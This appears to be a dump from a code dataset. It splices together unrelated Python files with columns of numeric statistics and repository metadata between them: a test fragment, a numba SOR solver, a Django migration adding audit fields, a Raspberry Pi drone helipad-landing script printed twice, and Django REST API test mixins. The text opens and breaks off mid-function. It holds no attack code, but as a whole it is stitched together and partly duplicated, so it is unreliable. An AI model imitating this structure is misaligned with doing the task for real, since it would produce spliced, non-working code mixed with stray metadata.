                "file.txt", "none", "ende", "file", "string", "hash"))

    def test_filesystem_wrong_destination_type_object(self):
        """An unknown destination_type value is rejected by filesystem_restore."""
        with self.assertRaisesRegex(ValueError, "destination_type"):
            self.loop.run_until_complete(client.command.filesystem_restore(
                "file.txt", "file", "ende", "none", "string", "hash"))
| 32.494656
| 80
| 0.554172
| 3,717
| 42,568
| 6.133441
| 0.074792
| 0.053952
| 0.044916
| 0.040004
| 0.881437
| 0.868146
| 0.84718
| 0.829239
| 0.817177
| 0.793052
| 0
| 0.006043
| 0.350827
| 42,568
| 1,309
| 81
| 32.519481
| 0.818955
| 0.005943
| 0
| 0.793372
| 0
| 0
| 0.072512
| 0.015025
| 0
| 0
| 0
| 0.000764
| 0.158869
| 1
| 0.064327
| false
| 0
| 0.015595
| 0.001949
| 0.087719
| 0.003899
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ad0acaed9bc39aa3a73fbb1c2c0cddfbff94b0a
| 1,879
|
py
|
Python
|
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | 1
|
2021-05-03T09:11:35.000Z
|
2021-05-03T09:11:35.000Z
|
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | null | null | null |
src/func/solve_matrix.py
|
wakky927/Computational-Engineering-B
|
3720d96668a32dc73f38ed0bc8afe4705452de9e
|
[
"MIT"
] | null | null | null |
import numpy as np
from numba import jit
@jit
def SOR1(md, p, ap, ae, aw, bb, m, p_exact, relax_factor):
    """SOR iteration converging on the per-sweep solution change (error1).

    Entries 1..m of the arrays are updated; p_old must also hold index
    m + 1, so this assumes md >= m + 1 — TODO confirm at call sites.
    Returns (iterations, max |dp|, max |p - p_exact|, max |raw update|).
    """
    eps = 1e-15  # convergence criterion
    error1, error2, error3 = 0, 0, 0  # per-sweep error maxima
    p_old = np.zeros(md + 1)
    n_iter = 1
    while True:
        # Reset the maxima and snapshot the previous iterate.
        error1 = 0
        error2 = 0
        error3 = 0
        for i in range(1, m + 1):
            p_old[i] = p[i]
        for i in range(1, m + 1):
            # Gauss-Seidel style update: p[i - 1] is already updated,
            # p_old[i + 1] is from the previous sweep; relaxed afterwards.
            update = -p_old[i] + (bb[i] - ae[i] * p_old[i + 1] - aw[i] * p[i - 1]) / ap[i]
            p[i] = p_old[i] + update * relax_factor
            error1 = max(error1, abs(p[i] - p_old[i]))
            error2 = max(error2, abs(p[i] - p_exact[i]))
            error3 = max(error3, abs(update))
        # Stop when converged on error1 or after 5000 sweeps.
        if error1 < eps or n_iter > 5000:
            break
        n_iter += 1
    return n_iter, error1, error2, error3
@jit
def SOR3(md, p, ap, ae, aw, bb, m, p_exact, relax_factor):
    """SOR iteration converging on the unrelaxed update size (error3).

    Identical to SOR1 except for the stopping criterion. Entries 1..m are
    updated; p_old must also hold index m + 1, so this assumes
    md >= m + 1 — TODO confirm at call sites.
    Returns (iterations, max |dp|, max |p - p_exact|, max |raw update|).
    """
    eps = 1e-15  # convergence criterion
    error1, error2, error3 = 0, 0, 0  # per-sweep error maxima
    p_old = np.zeros(md + 1)
    n_iter = 1
    while True:
        # Reset the maxima and snapshot the previous iterate.
        error1 = 0
        error2 = 0
        error3 = 0
        for i in range(1, m + 1):
            p_old[i] = p[i]
        for i in range(1, m + 1):
            # Gauss-Seidel style update: p[i - 1] is already updated,
            # p_old[i + 1] is from the previous sweep; relaxed afterwards.
            update = -p_old[i] + (bb[i] - ae[i] * p_old[i + 1] - aw[i] * p[i - 1]) / ap[i]
            p[i] = p_old[i] + update * relax_factor
            error1 = max(error1, abs(p[i] - p_old[i]))
            error2 = max(error2, abs(p[i] - p_exact[i]))
            error3 = max(error3, abs(update))
        # Stop when converged on error3 or after 5000 sweeps.
        if error3 < eps or n_iter > 5000:
            break
        n_iter += 1
    return n_iter, error1, error2, error3
| 24.402597
| 90
| 0.491219
| 290
| 1,879
| 3.065517
| 0.196552
| 0.035996
| 0.056243
| 0.040495
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0.926884
| 0
| 0.066496
| 0.375732
| 1,879
| 76
| 91
| 24.723684
| 0.69139
| 0.073976
| 0
| 0.884615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.115385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9ad3dade1dad31c3a996e1bafc837051bc282c45
| 9,914
|
py
|
Python
|
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | null | null | null |
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | 1
|
2022-03-21T03:04:31.000Z
|
2022-03-21T03:04:31.000Z
|
django/electric_power_sale/migrations/0009_auto_20220312_0221.py
|
zcjwin/hasura-django-auth
|
fd052bb05f051ee7fdaecf9433d5f6d7db580ca9
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.12 on 2022-03-12 02:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import electric_power_sale.models
class Migration(migrations.Migration):
    """Auto-generated migration (Django 3.2.12, 2022-03-12).

    Adds ``updated_at``/``updated_by`` to every listed model and, for the
    ``*line`` and ``customer`` models, also ``created_at``/``created_by``.
    The ``*_at`` fields default to ``default_cur_datetime``; the ``*_by``
    fields are nullable foreign keys to the configured user model with
    ``SET_NULL`` on delete.

    NOTE: generated file — prefer editing ``models.py`` and re-running
    ``makemigrations`` over changing this by hand.
    """

    dependencies = [
        # The *_by foreign keys target the swappable user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('electric_power_sale', '0008_contract_is_active'),
    ]

    operations = [
        migrations.AddField(
            model_name='agent',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='agent',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='contract',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='contract',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='contractline',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='contractline',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='contractline',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='contractline',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='customer',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='customer',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='customer',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='customer',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthadjust',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthadjust',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthagentbill',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthagentbill',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthagentbillline',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='mthagentbillline',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='mthagentbillline',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthagentbillline',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthcustomerbill',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthcustomerbill',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthcustomerbillline',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='mthcustomerbillline',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='mthcustomerbillline',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthcustomerbillline',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbill',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbill',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbillline',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbillline',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbillline',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthdiffcustomerbillline',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbill',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbill',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbillline',
            name='created_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='录入时间'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbillline',
            name='created_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='录入人'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbillline',
            name='updated_at',
            field=models.DateTimeField(default=electric_power_sale.models.default_cur_datetime, verbose_name='更新时间'),
        ),
        migrations.AddField(
            model_name='mthdraftcustomerbillline',
            name='updated_by',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL, verbose_name='更新人'),
        ),
    ]
| 47.663462
| 160
| 0.649788
| 1,048
| 9,914
| 5.871183
| 0.06584
| 0.111165
| 0.142045
| 0.166748
| 0.951893
| 0.951893
| 0.951893
| 0.852592
| 0.852592
| 0.852592
| 0
| 0.002636
| 0.234618
| 9,914
| 207
| 161
| 47.89372
| 0.80825
| 0.00464
| 0
| 0.945274
| 1
| 0
| 0.116765
| 0.021387
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019901
| 0
| 0.034826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b143f41933b36ec80a58296066fc4e91d9ae7f86
| 7,611
|
py
|
Python
|
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
examples/detect_Dat.py
|
datwwe/dronecontrol-MAVSDK
|
85d68de9b085832801de5acc77a6eb875613290c
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
import asyncio
from mavsdk import System
import io
import time
import picamera
from PIL import Image
from detect_img import detect_img
from yolo import YOLO
import math
import json
from mavsdk import (OffboardError, PositionNedYaw)
# Module-import side effect: read the MAVSDK connection settings once;
# aa['address'] is consumed by print_flight_mode() below.
# NOTE(review): hard-coded Raspberry Pi path — confirm before reuse.
with open('/home/pi/Downloads/MAVSDK-Python/examples/connect.json','r') as f:
    aa = json.load(f)
def image_generator(camera):
    """Yield PIL images captured from *camera*, one JPEG frame at a time."""
    while True:
        buffer = io.BytesIO()
        camera.capture(buffer, format='jpeg')
        buffer.seek(0)
        yield Image.open(buffer)
def calculate_distance(result, helipad_edge, image_width, image_height):
    """Convert a helipad detection into real-world offsets from the image centre.

    Args:
        result: detection output; result['helipad'] is either None or a dict
            with 'center_x', 'center_y', 'width' and 'height' in pixels.
        helipad_edge: physical edge length of the helipad, used to scale
            pixels to real units.
        image_width, image_height: camera frame size in pixels.

    Returns:
        dict with 'actual_delta_x', 'actual_delta_y' (scaled offsets) and
        'angle' in degrees, or None when no helipad was detected.
    """
    helipad = result['helipad']
    if helipad is None:
        return None
    image_center_x = int(image_width / 2)
    image_center_y = int(image_height / 2)  # fixed 'iamge_center_y' typo
    delta_x = helipad['center_x'] - image_center_x
    # Image y grows downward; negate so a positive delta_y means "up".
    delta_y = -(helipad['center_y'] - image_center_y)
    size = max(helipad['width'], helipad['height'])
    # assumes width/height > 0, otherwise this divides by zero — TODO confirm
    ratio = helipad_edge / size  # physical units per pixel
    actual_delta_x = delta_x * ratio
    actual_delta_y = delta_y * ratio
    # Bug fix: the original computed atan(delta_y / delta_x), which raised
    # ZeroDivisionError whenever the helipad sat exactly on the vertical
    # centre line. Keep atan semantics otherwise; map delta_x == 0 to +/-90.
    if delta_x == 0:
        angle = math.copysign(90.0, delta_y)
    else:
        angle = math.degrees(math.atan(delta_y / delta_x))
    return {
        'actual_delta_x': actual_delta_x,
        'actual_delta_y': actual_delta_y,
        'angle': angle
    }
async def print_flight_mode(yolo, helipad_edge, image_width, image_height ):
    """Run the land-on-helipad demo.

    Connects to the drone (address from connect.json), waits for the HOLD
    flight mode, switches to offboard, then streams camera frames through
    the detector; on the first detection it commands a relative NED move by
    the computed offsets and lands.

    Args:
        yolo: detector instance forwarded to detect_img.
        helipad_edge: physical helipad edge length used for pixel scaling.
        image_width, image_height: camera frame size in pixels.
    """
    drone = System()
    await drone.connect(system_address=aa['address'])
    print("Waiting for drone to connect...")
    # Block until the autopilot reports a connection.
    async for state in drone.core.connection_state():
        if state.is_connected:
            print(f"Drone discovered with UUID: {state.uuid}")
            break
    # Wait until the flight mode becomes HOLD before taking over.
    async for flight_mode in drone.telemetry.flight_mode():
        print("FlightMode:{}|||||||||".format(flight_mode))
        if str(flight_mode) == "HOLD":
            await asyncio.sleep(10)
            break
    print("-- Setting initial setpoint")
    await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, 0.0))
    print("-- Starting offboard")
    try:
        await drone.offboard.start()
    except OffboardError as error:
        # Offboard refused: disarm and abort the mission.
        print(f"Starting offboard mode failed with error code: {error._result.result}")
        print("-- Disarming")
        await drone.action.disarm()
        return
    with picamera.PiCamera() as camera:
        camera.resolution = (640, 480)
        camera.start_preview()
        count =0
        for image in image_generator(camera):
            # Save every frame for post-flight inspection.
            print('image' + str(count) +'.jpg')
            image.save('./video/test' + str(count)+'.jpg','jpeg')
            # image = Image.open('./video/outputframe2.jpg')
            count+=1
            result = detect_img(yolo,image)
            result = calculate_distance(result, helipad_edge, image_width, image_height)
            if result is not None:
                # Helipad found: move by the computed offsets, then land.
                print(result)
                print("-- Go 0m North, 10m East, 0m Down within local coordinate system, turn to face South")
                await drone.offboard.set_position_ned(PositionNedYaw(result['actual_delta_x'], result['actual_delta_y'], 0.0, 0.0))
                await asyncio.sleep(10)
                print("-- Stopping offboard")
                try:
                    await drone.offboard.stop()
                except OffboardError as error:
                    print(f"Stopping offboard mode failed with error code: {error._result.result}")
                await drone.action.land()
                await asyncio.sleep(5)
                break
            print(result)
            # if count ==3:
            #     break
if __name__ == "__main__":
    # Demo entry point: fixed camera geometry and helipad edge length.
    detector = YOLO()
    HELIPAD_EDGE = 0.562
    IMAGE_WIDTH = 640
    IMAGE_HEIGHT = 480  # spelling normalised from IMAGE_HEGIHT (local only)
    event_loop = asyncio.get_event_loop()
    event_loop.run_until_complete(
        print_flight_mode(detector, HELIPAD_EDGE, IMAGE_WIDTH, IMAGE_HEIGHT))
#!/usr/bin/env python3
import asyncio
from mavsdk import System
import io
import time
import picamera
from PIL import Image
from detect_img import detect_img
from yolo import YOLO
import math
import json
from mavsdk import (OffboardError, PositionNedYaw)
# Module-import side effect: read the MAVSDK connection settings once;
# aa['address'] is consumed by print_flight_mode() below.
# NOTE(review): hard-coded Raspberry Pi path — confirm before reuse.
with open('/home/pi/Downloads/MAVSDK-Python/examples/connect.json','r') as f:
    aa = json.load(f)
def image_generator(camera):
    """Yield PIL images captured from *camera*, one JPEG frame at a time."""
    while True:
        buffer = io.BytesIO()
        camera.capture(buffer, format='jpeg')
        buffer.seek(0)
        yield Image.open(buffer)
def calculate_distance(result, helipad_edge, image_width, image_height):
    """Convert a helipad detection into real-world offsets from the image centre.

    Args:
        result: detection output; result['helipad'] is either None or a dict
            with 'center_x', 'center_y', 'width' and 'height' in pixels.
        helipad_edge: physical edge length of the helipad, used to scale
            pixels to real units.
        image_width, image_height: camera frame size in pixels.

    Returns:
        dict with 'actual_delta_x', 'actual_delta_y' (scaled offsets) and
        'angle' in degrees, or None when no helipad was detected.
    """
    helipad = result['helipad']
    if helipad is None:
        return None
    image_center_x = int(image_width / 2)
    image_center_y = int(image_height / 2)  # fixed 'iamge_center_y' typo
    delta_x = helipad['center_x'] - image_center_x
    # Image y grows downward; negate so a positive delta_y means "up".
    delta_y = -(helipad['center_y'] - image_center_y)
    size = max(helipad['width'], helipad['height'])
    # assumes width/height > 0, otherwise this divides by zero — TODO confirm
    ratio = helipad_edge / size  # physical units per pixel
    actual_delta_x = delta_x * ratio
    actual_delta_y = delta_y * ratio
    # Bug fix: the original computed atan(delta_y / delta_x), which raised
    # ZeroDivisionError whenever the helipad sat exactly on the vertical
    # centre line. Keep atan semantics otherwise; map delta_x == 0 to +/-90.
    if delta_x == 0:
        angle = math.copysign(90.0, delta_y)
    else:
        angle = math.degrees(math.atan(delta_y / delta_x))
    return {
        'actual_delta_x': actual_delta_x,
        'actual_delta_y': actual_delta_y,
        'angle': angle
    }
async def print_flight_mode(yolo, helipad_edge, image_width, image_height ):
    """Run the land-on-helipad demo.

    Connects to the drone (address from connect.json), waits for the HOLD
    flight mode, switches to offboard, then streams camera frames through
    the detector; on the first detection it commands a relative NED move by
    the computed offsets and lands.

    Args:
        yolo: detector instance forwarded to detect_img.
        helipad_edge: physical helipad edge length used for pixel scaling.
        image_width, image_height: camera frame size in pixels.
    """
    drone = System()
    await drone.connect(system_address=aa['address'])
    print("Waiting for drone to connect...")
    # Block until the autopilot reports a connection.
    async for state in drone.core.connection_state():
        if state.is_connected:
            print(f"Drone discovered with UUID: {state.uuid}")
            break
    # Wait until the flight mode becomes HOLD before taking over.
    async for flight_mode in drone.telemetry.flight_mode():
        print("FlightMode:{}|||||||||".format(flight_mode))
        if str(flight_mode) == "HOLD":
            await asyncio.sleep(10)
            break
    print("-- Setting initial setpoint")
    await drone.offboard.set_position_ned(PositionNedYaw(0.0, 0.0, 0.0, 0.0))
    print("-- Starting offboard")
    try:
        await drone.offboard.start()
    except OffboardError as error:
        # Offboard refused: disarm and abort the mission.
        print(f"Starting offboard mode failed with error code: {error._result.result}")
        print("-- Disarming")
        await drone.action.disarm()
        return
    with picamera.PiCamera() as camera:
        camera.resolution = (640, 480)
        camera.start_preview()
        count =0
        for image in image_generator(camera):
            # Save every frame for post-flight inspection.
            print('image' + str(count) +'.jpg')
            image.save('./video/test' + str(count)+'.jpg','jpeg')
            # image = Image.open('./video/outputframe2.jpg')
            count+=1
            result = detect_img(yolo,image)
            result = calculate_distance(result, helipad_edge, image_width, image_height)
            if result is not None:
                # Helipad found: move by the computed offsets, then land.
                print(result)
                print("-- Go 0m North, 10m East, 0m Down within local coordinate system, turn to face South")
                await drone.offboard.set_position_ned(PositionNedYaw(result['actual_delta_x'], result['actual_delta_y'], 0.0, 0.0))
                await asyncio.sleep(10)
                print("-- Stopping offboard")
                try:
                    await drone.offboard.stop()
                except OffboardError as error:
                    print(f"Stopping offboard mode failed with error code: {error._result.result}")
                await drone.action.land()
                await asyncio.sleep(5)
                break
            print(result)
            # if count ==3:
            #     break
if __name__ == "__main__":
    # Demo entry point: fixed camera geometry and helipad edge length.
    detector = YOLO()
    HELIPAD_EDGE = 0.562
    IMAGE_WIDTH = 640
    IMAGE_HEIGHT = 480  # spelling normalised from IMAGE_HEGIHT (local only)
    event_loop = asyncio.get_event_loop()
    event_loop.run_until_complete(
        print_flight_mode(detector, HELIPAD_EDGE, IMAGE_WIDTH, IMAGE_HEIGHT))
| 36.242857
| 131
| 0.619629
| 944
| 7,611
| 4.811441
| 0.161017
| 0.008807
| 0.010568
| 0.010568
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0.016257
| 0.272632
| 7,611
| 209
| 132
| 36.416268
| 0.804191
| 0.024176
| 0
| 0.98913
| 0
| 0
| 0.16069
| 0.032354
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021739
| false
| 0
| 0.119565
| 0
| 0.173913
| 0.163043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b15718493a2e2753707b6f903fb7161858346b35
| 20,986
|
py
|
Python
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 2
|
2016-02-26T19:49:24.000Z
|
2017-04-04T18:36:43.000Z
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 68
|
2016-03-24T00:10:22.000Z
|
2021-03-19T21:49:22.000Z
|
zc_common/remote_resource/test_mixins.py
|
ZeroCater/common
|
28569037df93fc17336d7fdafe1318401b426331
|
[
"MIT"
] | 5
|
2016-04-29T19:02:17.000Z
|
2020-01-29T03:03:31.000Z
|
import ujson
import datetime
import dateutil.parser
from inflection import camelize
from rest_framework import status
from rest_framework.reverse import reverse
from .tests import USER, STAFF
class ResourceCreateTestCase(object):
    """Mixin: create-endpoint requests that must fail validation or auth."""

    # JSON:API media type expected by the endpoints under test.
    JSONAPI_TYPE = 'application/vnd.api+json'

    def _post_as_role(self, data, content_type=None):
        """POST *data* to the resource list endpoint as self.USER_ROLE."""
        return self.client_post_auth(
            reverse(self.resource_view_name),
            user_role=self.USER_ROLE,
            data=data,
            content_type=content_type if content_type else self.JSONAPI_TYPE,
        )

    def test_create__valid_data_incorrect_header(self):
        # A plain-JSON content type is rejected with 415.
        response = self._post_as_role(self.json_request,
                                      content_type='application/json')
        self.failure_response_structure_test(
            response, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)

    def test_create__empty_request(self):
        response = self._post_as_role({})
        self.failure_response_structure_test(
            response, status.HTTP_400_BAD_REQUEST)

    def test_create__missing_required_parameters(self):
        if not self.required_params:
            return True
        self.create_json_format['data']['attributes'] = {'random_key': 'This is a random value'}
        response = self._post_as_role(ujson.dumps(self.create_json_format))
        self.failure_response_structure_test(
            response, status.HTTP_400_BAD_REQUEST)

    def test_create__without_relationships(self):
        if not self.relationship_keys:
            return True
        self.create_json_format['data']['relationships'] = {}
        response = self._post_as_role(ujson.dumps(self.create_json_format))
        self.failure_response_structure_test(
            response, status.HTTP_400_BAD_REQUEST)

    def test_create__with_malformed_relationship_data(self):
        if not self.relationship_keys:
            return True
        key = camelize(self.relationship_keys[0], False)
        # Relationship data without a 'type' member is malformed JSON:API.
        self.create_json_format['data']['relationships'][key]['data'] = {
            'id': '1234'}
        response = self._post_as_role(ujson.dumps(self.create_json_format))
        self.failure_response_structure_test(
            response, status.HTTP_400_BAD_REQUEST)

    def test_create__post_non_json_data_correctly_errors(self):
        response = self._post_as_role('invalid_JSON_obj')
        self.failure_response_structure_test(
            response, status.HTTP_400_BAD_REQUEST)

    def test_create__unauthorized(self):
        # A request without credentials must yield 401.
        response = self.client_post_auth(
            reverse(self.resource_view_name),
            data=self.json_request,
            content_type=self.JSONAPI_TYPE)
        self.failure_response_structure_test(
            response, status.HTTP_401_UNAUTHORIZED)
class ResourceCreateWithoutPermissionTestCase(object):
    """Mixin: the same create requests, issued by a role without permission."""

    def _post_and_expect(self, data, expected_status,
                         content_type='application/vnd.api+json'):
        """POST *data* as self.USER_ROLE and assert the failure status."""
        response = self.client_post_auth(
            reverse(self.resource_view_name),
            user_role=self.USER_ROLE,
            data=data,
            content_type=content_type,
        )
        self.failure_response_structure_test(response, expected_status)

    def test_create__valid_data_incorrect_header(self):
        # NOTE(review): expects 403 rather than 415 — the permission check
        # appears to take precedence over content negotiation; confirm.
        self._post_and_expect(self.json_request, status.HTTP_403_FORBIDDEN,
                              content_type='application/json')

    def test_create__empty_request(self):
        self._post_and_expect({}, status.HTTP_403_FORBIDDEN)

    def test_create__missing_required_parameters(self):
        if not self.required_params:
            return True
        self.create_json_format['data']['attributes'] = {'random_key': 'This is a random value'}
        self._post_and_expect(ujson.dumps(self.create_json_format),
                              status.HTTP_403_FORBIDDEN)

    def test_create__without_relationships(self):
        if not self.relationship_keys:
            return True
        self.create_json_format['data']['relationships'] = {}
        self._post_and_expect(ujson.dumps(self.create_json_format),
                              status.HTTP_403_FORBIDDEN)

    def test_create__with_malformed_relationship_data(self):
        if not self.relationship_keys:
            return True
        key = camelize(self.relationship_keys[0], False)
        self.create_json_format['data']['relationships'][key]['data'] = {
            'id': '1234'}  # no 'type' member on purpose
        self._post_and_expect(ujson.dumps(self.create_json_format),
                              status.HTTP_403_FORBIDDEN)

    def test_create__post_non_json_data_correctly_errors(self):
        self._post_and_expect('invalid_JSON_obj', status.HTTP_403_FORBIDDEN)

    def test_create__unauthorized(self):
        # An anonymous request yields 401 regardless of permissions.
        response = self.client_post_auth(
            reverse(self.resource_view_name),
            data=self.json_request,
            content_type='application/vnd.api+json')
